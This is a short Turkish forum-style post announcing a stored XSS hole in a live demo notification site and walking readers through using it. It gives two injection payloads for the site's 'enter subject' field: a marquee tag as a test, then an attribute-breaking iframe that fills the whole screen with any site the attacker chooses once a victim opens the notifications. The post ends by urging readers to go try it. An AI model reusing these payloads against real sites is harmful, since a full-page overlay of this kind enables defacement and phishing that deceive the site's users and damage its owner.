http://demo.webslesson.info/ Soru Sorma Sitesi Xss Açıklığı
Merhaba Xss Açıklığı Kulanmasını Bilene Çok Önemli Bir Açıklık Olup Bilmeyene Oyuncak Olur :)
öncelikle
http://demo.webslesson.info/
sitenin amacı : bildirim.php test etmek yani facebook tarzı bildirim göndermek
,,
sitesine gidip
enter subject diyen yere
"><marquee>MERHABAAA
yazın mesaja da xxxxxx yazın ve bildirimlere tıklayınca herşey kayıyor .
bunun yerine
"><iframe src= "burayaURL.com" style=position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;> </iframe>
Koyunca Bildirimlere Basar Basmaz Tüm Ekran Sizin Verdiğiniz Site Olarak Gözükür.
Gidip Bakın :)